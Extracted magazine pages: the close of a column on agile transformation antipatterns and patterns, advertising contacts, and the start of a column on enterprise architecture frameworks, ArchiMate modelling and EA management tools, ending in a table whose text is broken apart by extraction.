Each area has autonomy and is empowered via a fed-erated model to improve on the desired outcomes as it sees fit, with fast feedback supported by training, coaching, and data. The context, culture, history, start-ing point, and impediments are unique. There’s no sil-ver bullet. People are more likely to accept change if they have autonomy and empowerment to figure out the “how” for themselves, building mastery in the pro-cess.5 There should be a small “center of enablement” team that provides servant leadership, coordination, and sharing and owns the resolution of impediments that span business units.

A few areas exist that share a common approach, to ensure organizational consistency. This includes consistent role names (e.g., Product Owner, Agile Team Lead, and Architecture Owner), a consistent target-state organizational-design model, and, espe-cially for regulated firms, a consistent lifecycle that supports continuous delivery.

ANTIPATTERN 4: TRANSFORMATION TREATED AS A PROJECT WITH AN END DATE

A capital T Transformation is launched with fanfare and an initiative name, articulated as a program with


ON DEVOPS

an end date, at which the transformation will be done. There’s a significant investment, with significant sav-ings predicted, which further fuels the capital T in Transformation with the need to do more, faster.

PATTERN 4: TRANSFORMATION IS CONTINUOUS

For organizational agility, there is no end date. Trans-formation is never done; it’s a constant process of learning, retrospection, experimentation, and improve-ment. The environment in which organizations oper-ate changes constantly, more quickly and unpredict-ably than ever. Progress is tracked via measures in line with the overall desired outcomes. The goals are to be the best at being better and become a learning organization.

ANTIPATTERN 5: LEADERS SAY, “TELL ME WHEN IT’S DONE”

Leaders have initiated an agile transformation, and the behavior observed is “tell me when it’s done,” with arms metaphorically crossed and little or no change in the leader’s or leadership team’s behavior.

As Frederic Laloux commented,

The level of consciousness of an organization cannot exceed the level of consciousness of its leader.10

PATTERN 5: LEADERS GO FIRSTTransformational leadership is a critical factor for suc-cessful ongoing continuous transformations. The 2017 State of DevOps Report showed that teams with the least transformative leaders were half as likely to exhibit high IT performance.11

Leadership can’t be outsourced. It can be sup-ported with coaching, training, and advice to shortcut learning. The first team to adopt continuous transfor-mation should be the leadership team, role-modeling the desired behaviors.

ANTIPATTERN 6: MIDDLE MANAGEMENT HAS NO ROLE

A common antipattern is when middle management, also called the “Frozen Middle,” has no clear role to play in the continuous transformation.12

Middle management not only has a hard job of delivering complex change and keeping stakeholders

happy but also now needs to change the way of work-ing at the same time, to a way it hasn’t experienced before. This can be deeply unsettling. Not only am I flying the plane through storms, with expectations on the landing time, I’m also now being asked to both fly it differently and upgrade the plane mid-flight.

PATTERN 6: MIDDLE MANAGEMENT HAS AN EXPLICIT ROLE

Middle management, as well as leaders, needs an explicit role in the continuous transformation. That role is being a coach, trainer, and teacher to one or more mentees, as per the Toyota Improvement Kata:

The primary task of Toyota’s managers and leaders does not revolve around improvement per se, but around increasing the improvement capability of people.13

This gives leaders at all levels a role to play that’s built into the daily work rather than simultaneously being classroom based and empowering the mentee.

ANTIPATTERN 7: NOT INSTITUTIONALIZING THE CHANGE

As John Kotter observed, one antipattern is the failure to institutionalize the change.12 This is manifested in not tackling systemic or behavioral norms in the orga-nization, such that as soon as a key leader who’s cham-pioning the change moves on, the organization snaps back to how it used to be with surprising speed.

According to Accelerating Performance, organiza-tions take five years to move up one performance sec-tor and only 18 months to slip back again.14

PATTERN 7: INSTITUTIONALIZE THE CHANGE

For large, old, bureaucratic, complex organizations, especially regulated ones, driving change through offi-cial standards can be effective. We’ve rewritten inter-nal standards and the product development lifecycle to embed desired behaviors, such as continuous deliv-ery, long-lived products, and a focus on outcomes over output.

This isn’t scary or intimidating; the “A word” isn’t being used. Internal audits are your friend; they help to independently verify that the standards are imple-mented and driving the right outcomes.


ON DEVOPS

ANTIPATTERN 8: MEASURING NOTHING OR THE WRONG THINGS

There are five easy ways to reduce the likelihood of a transformation’s success via the inappropriate use of metrics. First, don’t take a data-driven approach. Second, focus on team-level metrics (such as veloc-ity or the “say–do ratio”) and weaponize them. Third, measure just one thing, such that it’s achieved at the expense of other things (for example, measuring flow at the expense of quality). Fourth, measure the work-ers, not the work system, aiming for busy people. Finally, align top-down targets with anything other than outcomes.

PATTERN 8: MEASURE THE DESIRED OUTCOMES

Take a data-driven approach, with measures that are in line with the desired outcomes (for example, flow, inci-dents, and the colleague and customer Net Promoter Score). Make this data transparent to all, showing the trend over time.

Focus on the work, not the workers

The biggest issues will be where the work isn’t—that is, the big wait times due to handoffs and depen-dencies. Measure the flow efficiency in the value stream. In our experience, and anecdotally from other large companies, work typically is being worked on only 10 percent of the time between when it starts and when it reaches the customer’s hands.

ANTIPATTERN 9: NOT PRIORITIZING TECHNICAL EXCELLENCE

The 2017 State of DevOps Report showed that the gap between high- and low-performing organizations is closing regarding deployment frequency and lead time.11 However, the gap is widening for the change failure rate and mean time to recovery. This implies that the low-performing teams are working to improve speed but aren’t sufficiently prioritizing technical excellence or building quality into the process.

PATTERN 9: PRIORITIZE TECHNICAL EXCELLENCE

Along with adopting agile ways of working and reduc-ing lead time, it’s equally important to prioritize

investment in automation and the shifting left of qual-ity (that is, incorporating testing early during devel-opment), with test-first development and high levels of automation. Tests, code quality analysis, and secu-rity scanning are built into the CI pipeline, with the assembly line stopping when an issue arises. Quality becomes part of everyone’s job.

So, here are the takeaways from this article:

› Have a compelling “why.” › Focus on outcomes, not agile for agile’s sake. › Achieve big through small. › Foster autonomy, purpose, and mastery with

psychological safety. › Don’t take a one-size-fits-all approach. › Pursue continuous transformation and CI. › Leaders go first. › Give middle management a role. › Institutionalize the change. › Measure the desired outcomes. › Prioritize technical excellence.

In short, apply an agile mind-set to the rollout of agility, and treat it as a tool in the toolbox to achieve desired organizational outcomes. Approach con-tinuous transformation as a capability to be nurtured rather than as a project with a silver-bullet solution. Be the best at being better.

REFERENCES1. M.J. Perry, “Fortune 500 Firms 1955 v. 2017: Only 60

Remain, Thanks to the Creative Destruction That Fuels Economic Prosperity,” Am. Enterprise Inst., 20 Oct. 2017; http://www.aei.org/publication/fortune-500 -firms-1955-v-2017-only-12-remain-thanks-to-the -creative-destruction-that-fuels-economic-prosperity.

2. S.D. Anthony, S.P. Viguerie, and A. Waldeck, Corporate Longevity: Turbulence Ahead for Large Organizations, Innosight, 2016; https://www.innosight.com/wp -content/uploads/2016/08/Corporate-Longevity-2016 -Final.pdf.

3. R.M. Kanter, “Ten Reasons People Resist Change,” Harvard Business Rev., 25 Sept. 2012; https://hbr.org /2012/09/ten-reasons-people-resist-chang.

4. R. Maurer, One Small Step Can Change Your Life: The Kaizen Way, Workman, 2014.


ON DEVOPS

5. D.H. Pink, Drive: The Surprising Truth about What Motivates Us, Riverhead Books, 2009.

6. S. Sinek, “Start with Why,” TED Talk, Sept. 2009; https: //www.ted.com/talks/simon_sinek_how_great _leaders_inspire_action.

7. C. Aiken and S. Keller, “The Irrational Side of Change Management,” McKinsey Q., Apr. 2009; https: //www.mckinsey.com/business-functions /organization/our-insights/the-irrational-side-of -change-management.

8. Anastasia, “Understanding the Kubler-Ross Curve,” Cleverism, 24 June 2015; https://www.cleverism.com /understanding-kubler-ross-change-curve.

9. D. North, “Kicking the Complexity Habit,” 2014; http: //gotocon.com/dl/goto-chicago-2014/slides/DanNorth _KickingTheComplexityHabit.pdf.

10. F. Laloux, Reinventing Organizations, Nelson Parker, 2014.

11. N. Forsgren et al., 2017 State of DevOps Report, Puppet, 2017; https://puppet.com/resources/whitepaper/state -of-devops-report.

12. J.P. Kotter, Leading Change, Harvard Business Rev. Press, 2012.

13. M. Rother, Toyota Kata: Managing People for Improvement, Adaptiveness, and Superior Results, McGraw-Hill, 2009, p. 186.

14. C Price and S. Toye, Accelerating Performance: How Organizations Can Mobilize, Execute, and Transform with Agility, 2017, John Wiley & Sons.

JONATHAN SMART is Head of Ways of Work-ing at Barclays. Contact him through https://www.linkedin.com/in/jonathansmart.

Advertising Coordinator

Debbie SimsEmail: [email protected]: +1 714-816-2138 | Fax: +1 714-821-4010

Advertising Sales Contacts

Mid-Atlantic US:Dawn ScodaEmail: [email protected]: +1 732-772-0160Cell: +1 732-685-6068 | Fax: +1 732-772-0164

Southwest US, California:Mike HughesEmail: [email protected]: +1 805-208-5882

Northeast, Europe, the Middle East and Africa:David Schissler Email: [email protected]: +1 508-394-4026

Central US, Northwest US, Southeast US, Asia/Pacific:Eric Kincaid Email: [email protected]: +1 214-553-8513 | Fax: +1 888-886-8599Cell: +1 214-673-3742

Midwest US: Dave JonesEmail: [email protected]: +1 708-442-5633 Fax: +1 888-886-8599Cell: +1 708-624-9901

Jobs Board (West Coast and Asia), Classified Line Ads

Heather BounadiesEmail: [email protected]: +1 623-233-6575

Jobs Board (East Coast and Europe), SE Radio Podcast

Marie ThompsonEmail: [email protected]: +1 714-813-5094

ADVERTISER INFORMATION


EDITOR: Christof Ebert, Vector Consulting Services, [email protected]

DEPARTMENT: SOFTWARE TECHNOLOGY

Enterprise ArchitectureRicardo Perez-Castillo, Francisco Ruiz, Mario Piattini, and Christof Ebert

Enterprise Architecture (EA) allows companies to proactively assess and adjust policies and systems to achieve target business goals

that monetize relevant business disruptions. The notion and modeling technologies of EA originally stem from the 1980s. With growing digital transfor-mation needs, today EA is widely used in industry as a technology-driven, continuous-change process for companies and our entire society.1 It allows companies to model IT and thus evaluate change needs, including traditional IT, business processes, cloud services, and distributed embedded systems. Therefore, it facili-tates the growing needs of converging systems, such as IT services and distributed embedded systems, as in automotive electronics.6

EA is a coherent set of principles, methods, and models used in designing and comprehending the structure of a company, including their business pro-cesses, information systems, and IT infrastructure.2

It aligns business and the IT landscape in companies concurrently by managing the increasing system complexity. EA management (EAM) provides a way to holistically understand any system’s fundamental

organization through all embodied elements, such as people and their motivations, processes, services, applications, IT resources, and so forth. In this way, EA increases IT efficiency while continuing business innovation.

EA FRAMEWORKS AND MODELING LANGUAGES

Several EA frameworks and standards have recently emerged and achieved relevance. TOGAF3 has been widely adopted in the market—currently 80% of Global 50 companies and 60% of Fortune 500 compa-nies employ it—so it can be considered the de facto standard. TOGAF provides the architecture develop-ment method (ADM), which is a methodology for the iterative development of EA. Aside from the TOGAF framework, The Open Group released ArchiMate,4 a modeling language that represents different archi-tectural information; see “Example of the ArchiMate Model.” It allows EA modeling from different view-points, in which the position within the cells in Figure 1 highlights the stakeholders’ concerns. ArchiMate considers two dimensions: layers and aspects. Core layers represent the three levels at which it is pos-sible to model an enterprise in ArchiMate, i.e., busi-ness, application, and technology. Aspects refers to the active structure, behavior, and passive structure.


vol. 36, no. 4, 2019

FROM THE EDITOR

Digital transformation demands a thorough understanding of technology and impacts. Enterprise archi-tecture (EA) allows companies to model and assess their IT systems, business processes, and distrib-uted services. Authors Ricardo Perez-Castillo, Francisco Ruiz, Mario Piattini, and I dive into EA and state-of-the-practice technologies for EA modeling. As usual, a case study provides direct insight from an ongoing project. I look forward to hearing from both readers and prospective column authors about this column and the technologies you want to know more about. —Christof Ebert

Digital Object Identifier 10.1109/MS.2019.2909329 Date of publication: 18 June 2019


SOFTWARE TECHNOLOGY

The full framework in ArchiMate 3 also includes additional layers for strategy, physical and implemen-tation/migration elements, and a fourth aspect with motivational (why) elements.

Apart from TOGAF, other EA frameworks include DoDAF or MODAF (provided as a defense architecture framework by defense agencies) and the Zachman archi-tecture framework, among other proprietary frameworks and model-ing languages used by certain EAM tools or in specific domains.

BENEFITS OF EAMCompanies that implement an EAM can achieve sev-eral benefits,5 which can be classified in benefits for business managers and those for IT practitioners.

Business managers receive the following benefits.

› EAM improves the decision-making process. Since EA models can represent an enterprise’s layers and their elements’ modularly, managers make decisions in the context of a whole rather than an isolated part.

› Agile adaptability occurs because EAM facilitates the knowledge acquisition that is necessary for changing systems and adopting new components. In other words, it is a tool for digital transformation.

› There is business process improvement and reengineering since EAM can be used to improve the operating procedures by modeling and understanding business processes.

› EAM handles the impact of staff turnover. EA models can gather knowledge from the staff and then business solutions from third-party organizations are consistently compliant with the current EA models.

The following benefits are for IT and software (SW) practitioners.

› EAM is a tool for managing complexity. It improves the scoping and coordination of

software and services, as well as information systems projects in general, by depicting interde-pendencies in a usable way. New approaches to address the issue of making software, as DevOps or micro services, have important advantages but the tail of the coin is the increased complex-ity. This is the reason that software development organizations, departments, or teams must increasingly consider EAM.

› EAM can be employed to detect technical resource oversight and, therefore, can identify and remove redundancies.

› EAM controls and shares knowledge modularly. Thus, EA models can be visualized across different levels, which offers different views for different stakeholders according to their concerns while other irrelevant elements are abstracted.

› Since this kind of resources and systems can be aligned to business strategies and are better placed for responsiveness, IT/software visibility improves.

EAM ToolsEAM includes EA modeling, although it is not limited to this activity. EAM also handles the maintenance and continuous improvement of EA models, different kinds of analysis, and a plan for moving forward toward a desired future state of the organization, among other important activities. Companies can address all of these elements because the proliferation of tools

Passive Structure Behavior Active Structure

Business

Application(Information

Systems)

Technology

Business Objects Business ServicesBusiness Processes

Business RolesBusiness Actors

Data Objects App ServicesApp Functions App Components Layers

Aspects

Data StoreOther IT Artifacts

IT ServicesIT Functions

IT SystemsIT and

Network Devices

FIGURE 1. The ArchiMate 3 core framework (adapted from The Open Group4).


SOFTWARE TECHNOLOGY

EXAMPLE OF THE ARCHIMATE MODEL

T he following is a real case study. We supported an IT company in establishing DevOps and migrat-

ing their previous enterprise architecture (EA). Figure S1 shows the underlying ArchiMate model to support DevOps in an organization. To address the complexity, which is standard in current software development, EA incorporates the viewpoint mechanism that is based on the divide and conquer principle, which offers each stakeholder only the aspects that are of interest to

their concerns. The top part of Figure S1 shows an ArchiMate 3 model with the architecture to support DevOps in an organization. This model is based on the viewpoint shown at the bottom part of Figure S1, which was devised thinking in a DevOps team, integrating ele-ments of development and operations.

Figure S1 presents relevant elements in every layer of the organization according to those depicted in Figure 1. Notice that the graphical notation of

DevOps Ecosystems

Artifact

InfrastructureFunction

InfrastructureService

InfrastructureInterface

Node

Device

Location

CommunicationPath

NetworkSystemSo�ware

DevOps RoleApplication

FunctionApplicationComponent

Specific Business LogicSW Internally Operated

Any Element ofDevOps Ecosystem

There are alsoaggregation

relationships of eachtype of element

with itself.

Viewpoint

(a)

(b)

View

DevOps Supportto Projects DevOps Platform

DevOps-DevelopmentWeb Portal

AgileProjects

ManagementWiki IDE

Repositoryand Version

ControlCode

AnalysisContinuousIntegratior

Test CasesManagement

TestingAutomatior

BurndownDiagrams

MonitoringReports

DevOpsSupportManager

Selenium

JMeter

TestLink

Jenkins

SonarQube

SVN

Git

SCM-Manager

ECLIPSE

VisualStudio

Confluence

JIRA

JIRAAgile

DevOps: 1 Server Code Analysis

IT Infrastructure for DevOps Ecosystem

FIGURE S1. An example of the ArchiMate model representing DevOps in an organization. (a) The view and (b) corresponding viewpoint. IDE: integrated development environment; SCM: software control management; SVN: subversion.


SOFTWARE TECHNOLOGY

covers most of these activities. The following are some common, critical capabilities that must be assessed in any EAM tool.

› Frameworks and standards: EAM tools can support different kinds of frameworks and EA methodologies. Thus, they often provide best-practice workflows to enable rapid deploy-ment and implementation. However, many enterprise architects must implement their own workflows. In addition, it is important to consider the available modeling languages that EAM tools support, as well as the repository metamodel used, to manage all the EA information.

› Modeling: This capability refers to the extent to which the tool allows modeling of all the concepts and elements depicted by the sup-ported frameworks and standards. Usability makes the difference. Additionally, there are two approaches, integration and single point of truth, regarding the information base the EAM modelers use. It depends on whether or not data is collected from a variety of sources.

› Visualization: This refers to efficiently showing adequate information in an acceptable way to the suitable people. An EAM tool should address enterprise cartography challenges, which are based on the following problems that traditional cartography deals with: - representing (map) a real-world object, i.e., an

enterprise in EAM - eliminating irrelevant characteristics of

the mapped object to the purpose, which is essential to represent the enterprise in a relevant and useful manner

- orchestrating the elements of the map to best

convey its message to its audience according to their specific needs and expectations.

› Decision analysis: Models and EA informa-tion analyses are useful for making informed decisions. In this sense, both visualization and collaborative communication capabilities con-tribute to the success of such decision-making processes.

› Administration and configurability: There are two main approaches regarding the functional-ity provided by the tool out of the box: preconfig-ured (EAM solutions) and customization (EAM platforms).

Table 1 collects some of these EAM tools by provid-ing the following: name, frameworks and standards supported, benefits for enterprise architects, stronger points for IT/software practitioners, and pricing infor-mation. The tools collected in Table 1 were selected according to several industrial reports provided by well-known consulting companies (e.g., Gartner or Forrester, among other) and our personal experience using some of these EAM tools, which are presented in alphabetical order.

HINTS FOR IT AND SOFTWARE PRACTITIONERS

EA allows IT and software practitioners to manage the complexity of IS and technologies and to align these systems/technologies with their organization’s strat-egy. Thus, IT and software development teams should integrate people who are skilled and competent for planning and designing EA, as well as for deploying and maintaining it, with an EA profile. This new EA profile for IT/software practitioners should consider the fol-lowing points.

ArchiMate takes many elements from other well-known modeling languages, such as Unified Modeling Language or Business Process Model and Notation (BPMN). It is relevant to note that ArchiMate is not an alternative to UML or BPMN but an umbrella to integrate UML, BPMN, and any other kind of specific

model. For instance, BPMN is the language suit-able to represent the internal details (white box) of processes while ArchiMate has been considered to represent the things around each process (black box), expressed in relationships with roles, services, organizational structures, strategies, motivations, data, or applications.

sidebar cont.


SOFTWARE TECHNOLOGY

Tool

Fram

ewor

ks a

nd s

tand

ards

Usef

ulne

ss fo

r ent

erpr

ise

arch

itect

sUs

eful

ness

for I

T/so

ftw

are

prac

titio

ners

Pric

ing

Alfa

bet E

AM•

TOG

AF/A

rchi

Mat

e to

gui

de th

e EA

pr

actic

e, a

s w

ell a

s Za

chm

an•

Oth

er in

dust

ry-s

peci

�c fr

ame

-w

orks

(e.g

., TM

For

um o

r DoD

AF)

•Id

enti�

es c

ost d

river

s to

redu

ce o

pera

tiona

l exp

ense

s an

d ke

eps

trac

k of

IT in

vest

-m

ents

to a

ssur

e bu

sine

ss g

row

th•

Mas

ter p

lann

ing

prov

ides

the

IT o

rgan

izat

ion

with

a c

lear

ove

rvie

w o

f the

rele

vant

as

pect

s of

the

IT la

ndsc

ape

in o

rder

to u

nder

stan

d ho

w s

trat

egic

dec

isio

ns w

ill

and

shou

ld im

pact

the

IT’s

tact

ics

and

dire

ctio

n ov

er ti

me

•Es

tabl

ishe

s ke

y el

emen

ts o

f EA

gove

rnan

ce, e

ncom

pass

ing

ente

rpris

e-w

ide

poli

-ci

es fo

r the

des

ign,

impl

emen

tatio

n, a

nd a

utom

atio

n of

EA

proc

esse

s

•IT

str

ateg

y an

d pl

anni

ng p

roce

ss•

Alig

n IT

str

uctu

res

with

ope

ratio

nal o

bjec

tives

and

•

proc

esse

s to

ens

ure

that

IT tr

ansf

orm

atio

n•

Thre

e de

ploy

men

t opt

ions

: clo

ud, S

aaS,

and

web

Pric

ing

has

to b

e re

ques

ted

from

com

mer

cial

de

part

men

t

Arch

i•

Arch

iMat

e (n

ativ

e su

ppor

t) an

d al

igne

d w

ith T

OG

AF•

Prov

ides

a c

anva

s-m

odel

ing

tool

kit t

hat c

an b

e us

ed to

des

ign

and

crea

te re

usab

le

canv

as te

mpl

ates

•Si

nce

it is

ope

n so

urce

, it i

s fr

ee a

lthou

gh th

e su

ppor

t is

limite

d

•In

tegr

atio

n w

ith o

ther

tool

s is

lim

ited

but i

s ba

sed

on th

e Ec

lipse

pla

tfor

m, a

nd s

ever

al p

lugi

ns a

re a

vaila

ble

to

expa

nd th

e m

ain

func

tiona

lity

Free

, OSS

Avol

utio

n Ab

acus

•O

ver 1

00 in

dust

ry-s

tand

ard

mod

-el

ing

fram

ewor

ks a

nd n

otat

ions

(e

.g.,

TOG

AF, A

rchi

Mat

e, P

EAF)

•O

ffer

s ch

art r

oad

map

s fo

r IT

and

busi

ness

sys

tem

s an

d pr

oces

ses

Can

asse

ss s

cena

rios

usi

ng a

lgor

ithm

s an

d tr

adeo

ff a

naly

sis

tech

niqu

es•

(dis

cret

e ev

ent,

Mon

te C

arlo

, and

so

on)

•Ad

vanc

ed v

isua

lizat

ion

mod

els

•Pr

ovid

es a

RES

T AP

I tha

t sim

pli�

es e

xter

nal i

nteg

ratio

ns

sign

i�ca

ntly

•In

tegr

ates

diff

eren

t dat

a so

urce

s lim

ited

Thre

e pr

icin

g pl

ans

BiZZ

desi

gn

Ente

rpris

e St

udio

•St

rong

ly fo

cuse

s on

TO

GAF

, Ar

chiM

ate,

BPM

N, a

nd U

ML,

am

ong

othe

rs•

Nat

ive

Arch

iMat

e 3

supp

ort f

or

cons

iste

nt m

odel

ing

•St

rong

sup

port

and

inte

grat

ion

with

TO

GAF

AD

M•

Supp

orts

mot

ivat

iona

l dia

gram

s•

Busi

ness

des

ign

capa

bilit

ies

and

anal

yses

as

wel

l as

supp

ort f

or d

ecis

ion

mak

ing

with

cus

tom

izab

le v

iew

s an

d da

shbo

ards

•Ex

tra

feat

ures

suc

h as

tran

sfor

mat

ion

road

map

ping

, cap

abili

ty m

appi

ng, a

nd ri

sk

asse

ssm

ent

•Pr

ovid

es c

oher

ent d

ata

gove

rnan

ce s

truc

ture

with

role

s an

d re

spon

sibi

litie

s lin

ked

to y

our a

rchi

tect

ure

and

orga

niza

tion

•So

me

diag

ram

s ca

n be

gen

erat

ed a

utom

atic

ally

Pric

ing

has

to b

e re

ques

ted

from

com

mer

cial

de

part

men

t

BOC

Gro

up

ADO

IT•

TOG

AF a

nd A

rchi

Mat

e•

BizB

ok, B

IAN

•CO

BIT

and

ITIL

•Su

ppor

t for

str

ateg

ic c

ompa

ny p

lann

ing

•Su

ppor

t for

clo

ud m

igra

tion,

whi

ch h

elps

to id

entif

y an

d an

alyz

e th

e m

ost

valu

able

IT a

sset

s, c

ost d

river

s, a

nd th

e in

form

atio

n, te

chno

logy

, and

sec

urity

ris

ks o

f mig

ratin

g to

the

clou

d

•Co

ntin

uous

ly o

ptim

ize

your

app

licat

ion

and

tech

nolo

gy

port

folio

Pric

ing

has

to b

e re

ques

ted

•Av

aila

ble

as a

pro

duct

or

Saa

S•

ADO

IT: c

omm

unity

ed

ition

free

Dra

gon1

•Pr

oprie

tary

not

atio

n bu

t sup

port

s TO

GAF

(AD

M) a

nd A

rchi

Mat

e am

ong

othe

rs

•Ad

vanc

ed m

odel

ing

and

visu

aliz

atio

n fe

atur

es•

A se

t of d

iffer

ent w

eb-b

ased

tool

s to

sup

port

dec

isio

n m

anag

emen

t, EA

, pro

ject

m

anag

emen

t, ris

k m

anag

emen

t, go

vern

ance

, com

plia

nce,

IT p

ortf

olio

man

age

-m

ent,

and

busi

ness

pro

cess

ana

lysi

s

•Ra

tiona

lize

appl

icat

ions

in a

sm

art w

ay u

sing

an

appl

ica-

tion

land

scap

e di

agra

m•

Adva

nced

impo

rtin

g/ex

port

ing

func

tiona

litie

s be

twee

n di

ffer

ent E

A re

posi

torie

s

Two

vers

ions

: US$

390–

3,98

0/ye

ar (i

ndiv

idua

l)US

$45,

000/

year

(c

ompa

ny)

EAM

s•

Cust

omiz

ed a

rchi

tect

ural

re

pres

enta

tions

and

nav

igat

ion

path

s; c

an e

xtra

ct in

form

atio

n fr

om B

PMN

, UM

L, A

rchi

Mat

e, a

nd

IDEF

, am

ong

othe

rs

•An

EA

tool

on

its o

wn

that

inte

grat

es a

nd h

arve

sts

oper

atio

nal i

nfor

mat

ion

to

enric

h ar

chite

ctur

e an

alys

is a

nd d

ecis

ion

mak

ing

•Li

ve a

rchi

tect

ure:

see

the

arch

itect

ure

of th

e or

gani

zatio

n as

em

ergi

ng fr

om o

ngo

-in

g in

to fo

rese

en p

roje

cts

thro

ugh

hist

oriz

atio

n•

Supp

ort e

nter

pris

e ca

rtog

raph

y

•Ar

chite

ctur

al v

iew

s m

ust b

e ge

nera

ted

auto

mat

ical

ly,

sinc

e “h

andm

ade”

mod

els

do re

quire

a m

ajor

eff

ort t

o up

-da

te a

nd re

fer t

o a

sing

le p

oint

in ti

me,

esp

ecia

lly w

here

so

ftw

are

prac

titio

ners

are

not

ski

lled

enou

gh in

EA

Pric

ing

has

to b

e re

ques

ted

from

com

mer

cial

de

part

men

t.Fo

ur d

iffer

ent p

lans

.

Esse

ntia

l•

Spec

i�c

base

d on

the

Pro

-té

gé O

ntol

ogy

Proj

ect.

Avai

labl

e cu

stom

-bui

lt Pr

oteg

e ex

tens

ions

•Pr

ovid

es a

�ex

ible

and

ext

ensi

ble

mea

ns to

gen

erat

e th

e vi

ews

on th

e m

odel

ca

ptur

ed u

sing

the

esse

ntia

l mod

eler

•Al

low

org

aniz

atio

ns to

de�

ne a

nd p

ublis

h cu

stom

vie

ws

and

repo

rts

to m

eet t

heir

indi

vidu

al n

eeds

•A

Java

-bas

ed w

eb a

pplic

atio

n th

at r

uns

on a

ny s

tand

ard

Java

ser

ver p

latf

orm

•

Uses

a k

now

ledg

e re

posi

tory

opt

iona

lly s

uppo

rted

by

an

RDBM

S

Free

, OSS

Futu

re te

ch

syst

ems

Envi

sion

VIP

•D

oDAF

, pra

gmat

ic E

A, T

OG

AF,

UML,

BPM

N, Z

achm

an•

Inte

grat

es s

ever

al k

inds

of m

odel

s, n

ot o

nly

EA m

odel

s•

Envi

sion

you

r fut

ure:

“to

be”

mod

els

show

the

inve

stm

ent r

equi

red

and

bene

�ts

to

be g

aine

d by

re-e

ngin

eerin

g

•Pr

actit

ione

rs c

an a

pply

�lte

rs a

nd r

ules

to m

anag

e an

d an

alyz

e m

odel

s us

ing

tech

niqu

es s

uch

as s

prea

dshe

et-

like

mat

rix a

naly

sis,

pow

erfu

l rep

ort w

ritin

g to

ols,

and

SQ

L qu

erie

s•

Mod

els

and

othe

r inf

orm

atio

n ca

n be

exp

orte

d to

oth

er

prod

uctiv

ity a

pplic

atio

ns a

nd d

atab

ases

Pric

ing

has

to b

e re

ques

ted

from

com

mer

cial

de

part

men

t •

Avai

labl

e as

a p

rodu

ct

and

SaaS

TABL

E 1.

EA

M s

uite

s.


SOFTWARE TECHNOLOGY

IBM

Rat

iona

l So

ftw

are

Arch

itect

•Pr

opri

etar

y; A

rchi

Mat

e is

sup

-po

rted

thro

ugh

third

-par

ty p

lugi

ns•

Allo

w e

nter

pris

e an

alys

is fo

r mak

ing

fast

, val

ue-b

ased

dec

isio

ns•

This

is n

ot o

nly

an E

AM to

ol b

ut a

gen

eral

-pur

pose

tool

•So

lutio

ns fo

r Dev

Ops

and

con

tinuo

us e

ngin

eerin

g•

Prov

ides

inte

grat

ion

with

man

y ot

her p

rodu

cts,

esp

ecia

lly

thos

e fr

om th

e IB

M e

cosy

stem

US$5

00–2

,200

/yea

r

Lean

ix•

Fram

ewor

k an

d st

anda

rd

inde

pend

ent,

but T

OG

AF c

an b

e im

plem

ente

d w

ith L

eani

x

•O

ffer

s th

e po

ssib

ility

of f

ollo

win

g th

e TO

GAF

AD

M m

etho

dolo

gy a

nd s

uppo

rt a

n ag

ile v

ersi

on o

f tha

t met

hodo

logy

•In

tegr

atio

n w

ith m

any

othe

r sof

twar

e en

gine

erin

g to

ols

(e.g

., G

itHub

, GitL

ab, J

enki

ns, C

on�u

ence

, Pen

taho

, Ta

blea

u, S

AP)

On

dem

and:

has

to b

e re

ques

ted,

two

pric

ing

plan

sAd

vanc

ed fe

atur

es:

US$5

,700

/mon

th

Mod

elio

•TO

GAF

•UM

L, B

PMN

•So

aML,

Sys

ML

•O

pen

sour

ce e

dito

r sup

port

ing

TOG

AF w

ith a

n ex

tens

ion

mec

hani

sm•

Not

an

EAM

tool

itse

lf, it

is a

gen

eral

-pur

pose

mod

elin

g to

ols

that

sup

port

s EA

m

odel

ing

•Fl

e xib

le e

xten

sion

mec

hani

sm•

Scrip

ting

lang

uage

sup

port

(Jyt

hon)

Free

, OSS

Meg

a H

opex

EA

sui

te•

DoD

AF, N

AF, T

OG

AF, A

rchi

Mat

e;

diff

eren

t pro

duct

s re

leas

ed fo

r ev

ery

fram

ewor

k/st

anda

rd

•Cr

eate

s gr

aphi

cal r

epre

sent

atio

ns o

f AD

M p

hase

s to

use

as

a gu

idel

ine

for

arch

itect

ure

proj

ects

•M

aps

TOG

AF A

DM

ste

ps a

nd d

eliv

erab

les

to th

e co

rres

pond

ing

conc

epts

, rep

orts

, an

d di

agra

ms

•Co

mpl

ies

with

the

TOG

AF a

rchi

tect

ure

cont

ent f

ram

ewor

k

•H

elps

pra

ctiti

oner

s to

des

ign

and

impl

emen

t agi

le IT

sy

stem

s, s

trea

mlin

ed b

usin

ess

proc

esse

s, a

nd o

ptim

ized

op

erat

ing

fram

ewor

ks a

ligne

d w

ith th

eir b

usin

ess

stra

tegi

es•

Adva

nced

repo

rtin

g fe

atur

es

Pric

ing

has

to b

e re

ques

ted

from

com

mer

cial

de

part

men

t

Orb

us

soft

war

e iS

erve

r

•TO

GAF

and

Arc

hiM

ate

•D

oDAF

, MoD

AF, F

EAF

•UM

L•

IT4I

T•

ITIL

•Le

vera

ge p

rede

�ned

met

a m

odel

s fo

r maj

or s

tand

ards

suc

h as

TO

GAF

and

Arc

hi-

Mat

e ac

cele

ratin

g ad

optio

n•

Com

mun

icat

ion

impr

oved

sin

ce a

rchi

tect

ure

view

s, re

port

s, a

nd d

ashb

oard

s ca

n be

pub

lishe

d ou

t to

key

stak

ehol

ders

and

the

wid

er b

usin

ess

•M

anag

es th

e IT

Val

ue C

hain

thro

ugh

the

IT4I

T Re

fere

nce

Arch

itect

ure

stan

dard

•Im

port

and

syn

chro

nize

dat

a vi

a RE

ST A

PI fr

om C

MD

Bs o

r ot

her m

odel

ing

tool

s an

d sy

stem

s.•

Inte

grat

ion

with

Of�

ce a

nd V

isio

and

oth

er M

icro

soft

tool

s

Pric

ing

has

to b

e re

ques

ted

from

com

mer

cial

de

part

men

t

Plan

view

En

terp

rise

One

•TO

GAF

cer

ti�ed

; how

ever

, it u

ses

a pr

oprie

tary

met

amod

el•

Supp

orts

sea

rcha

ble

tech

nolo

gy li

fecy

cles

and

vis

ualiz

atio

ns; E

A te

ams

can

proa

ctiv

ely

plan

and

prio

ritiz

e te

chno

logy

upd

ates

and

sta

ndar

diza

tion

acro

ss th

e en

terp

rise

•D

e�ni

tion

of h

ow to

ach

ieve

the

digi

tal s

trat

egy

with

road

map

s th

at c

onne

ct

prog

ram

s, p

roje

cts,

cap

abili

ties,

IT, a

nd in

vest

men

ts•

Adva

nced

ana

lysi

s fe

atur

es fo

r bus

ines

s-ca

